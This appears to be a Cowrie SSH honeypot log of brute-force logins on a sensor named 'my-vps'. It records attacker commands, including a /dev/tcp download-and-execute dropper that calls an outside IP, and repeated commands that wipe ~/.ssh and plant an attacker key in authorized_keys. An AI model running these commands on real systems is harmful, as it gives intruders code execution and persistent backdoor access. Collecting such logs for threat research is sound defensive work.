{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T14:40:03.267425Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T14:40:03.866924Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:40:05.597308Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:40:06.058622Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T14:40:06.061018Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/o32BW5aleY && chmod +x /tmp/o32BW5aleY && /tmp/o32BW5aleY 5OOImXQ8MSN1gYj0lov3gZV6IjEmfo+I8ZyL8o2bYiM4ImKdj/mTlfKJmGwqLiB9mJfxkJXtgZ12JDAjeJeZ+4uU8IGBfSE2PH2ajPmTlfKInvnnmKblFfwHqQkhJFyYlQ==\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/o32BW5aleY && chmod +x /tmp/o32BW5aleY && /tmp/o32BW5aleY 5OOImXQ8MSN1gYj0lov3gZV6IjEmfo+I8ZyL8o2bYiM4ImKdj/mTlfKJmGwqLiB9mJfxkJXtgZ12JDAjeJeZ+4uU8IGBfSE2PH2ajPmTlfKInvnnmKblFfwHqQkhJFyYlQ==\" &","sensor":"my-vps","timestamp":"2025-09-08T14:40:12.277437Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/87D5zd4xWX","message":"CMD: head -c 1458464 > /tmp/87D5zd4xWX","sensor":"my-vps","timestamp":"2025-09-08T14:40:12.281164Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T14:40:12.491179Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T14:40:12.497616Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T14:40:12.502518Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eb671abc9c8b9a1ebe193f7009907596a979797d67e4ec025a25c9bc4c94f5ed","size":1948,"shasum":"eb671abc9c8b9a1ebe193f7009907596a979797d67e4ec025a25c9bc4c94f5ed","duplicate":false,"duration":"6.4","message":"Closing TTY Log: var/lib/cowrie/tty/eb671abc9c8b9a1ebe193f7009907596a979797d67e4ec025a25c9bc4c94f5ed after 6.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:40:12.504457Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:40:12.505829Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43088,"dst_ip":"1.2.3.4","dst_port":22,"session":"e55dd60c1e07","protocol":"ssh","message":"New connection: 212.227.235.229:43088 (1.2.3.4:22) [session: e55dd60c1e07]","sensor":"my-vps","timestamp":"2025-09-08T14:40:42.059343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:40:42.059994Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:40:42.183522Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.login.success","username":"root","password":"Heslo1234","message":"login attempt [root/Heslo1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:40:42.714901Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:40:42.974860Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:40:42.975600Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:40:42.976730Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:40:43.100322Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:40:43.453110Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:40:43.453901Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:40:43.579080Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:40:43.579793Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43104,"dst_ip":"1.2.3.4","dst_port":22,"session":"68d5bac53a73","protocol":"ssh","message":"New connection: 212.227.235.229:43104 (1.2.3.4:22) [session: 68d5bac53a73]","sensor":"my-vps","timestamp":"2025-09-08T14:40:43.696484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:40:43.697795Z","src_ip":"212.227.235.229","session":"68d5bac53a73"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:40:43.819718Z","src_ip":"212.227.235.229","session":"68d5bac53a73"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:40:44.294410Z","src_ip":"212.227.235.229","session":"68d5bac53a73"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:40:45.415255Z","src_ip":"212.227.235.229","session":"68d5bac53a73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43116,"dst_ip":"1.2.3.4","dst_port":22,"session":"17f7eb4502a1","protocol":"ssh","message":"New connection: 212.227.235.229:43116 (1.2.3.4:22) [session: 17f7eb4502a1]","sensor":"my-vps","timestamp":"2025-09-08T14:40:45.537923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:40:45.538876Z","src_ip":"212.227.235.229","session":"17f7eb4502a1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:40:45.661350Z","src_ip":"212.227.235.229","session":"17f7eb4502a1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:40:46.190987Z","src_ip":"212.227.235.229","session":"17f7eb4502a1"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:40:46.313887Z","src_ip":"212.227.235.229","session":"e55dd60c1e07"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:40:46.315611Z","src_ip":"212.227.235.229","session":"17f7eb4502a1"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":34604,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fa3788ee7bc","protocol":"ssh","message":"New connection: 158.51.124.56:34604 (1.2.3.4:22) [session: 8fa3788ee7bc]","sensor":"my-vps","timestamp":"2025-09-08T14:41:38.792266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:41:38.793165Z","src_ip":"158.51.124.56","session":"8fa3788ee7bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:41:38.932065Z","src_ip":"158.51.124.56","session":"8fa3788ee7bc"}
{"eventid":"cowrie.login.failed","username":"install","password":"1234567","message":"login attempt [install/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T14:41:39.530808Z","src_ip":"158.51.124.56","session":"8fa3788ee7bc"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:41:40.672505Z","src_ip":"158.51.124.56","session":"8fa3788ee7bc"}
{"eventid":"cowrie.session.connect","src_ip":"189.63.32.160","src_port":5326,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1c3d00acd34","protocol":"ssh","message":"New connection: 189.63.32.160:5326 (1.2.3.4:22) [session: a1c3d00acd34]","sensor":"my-vps","timestamp":"2025-09-08T14:41:45.853290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:41:45.854710Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:41:46.090531Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.login.success","username":"root","password":"Tester123","message":"login attempt [root/Tester123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:41:47.071652Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49550,"dst_ip":"1.2.3.4","dst_port":22,"session":"1649cd7fe403","protocol":"ssh","message":"New connection: 217.72.205.35:49550 (1.2.3.4:22) [session: 1649cd7fe403]","sensor":"my-vps","timestamp":"2025-09-08T14:41:47.227300Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:41:47.228327Z","src_ip":"217.72.205.35","session":"1649cd7fe403"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:41:47.596950Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:41:47.597641Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:41:47.598688Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:41:47.835709Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:41:48.326356Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:41:48.327026Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:41:48.565040Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:41:48.565905Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.connect","src_ip":"189.63.32.160","src_port":18551,"dst_ip":"1.2.3.4","dst_port":22,"session":"757d0f5280dc","protocol":"ssh","message":"New connection: 189.63.32.160:18551 (1.2.3.4:22) [session: 757d0f5280dc]","sensor":"my-vps","timestamp":"2025-09-08T14:41:48.800544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:41:48.801450Z","src_ip":"189.63.32.160","session":"757d0f5280dc"}
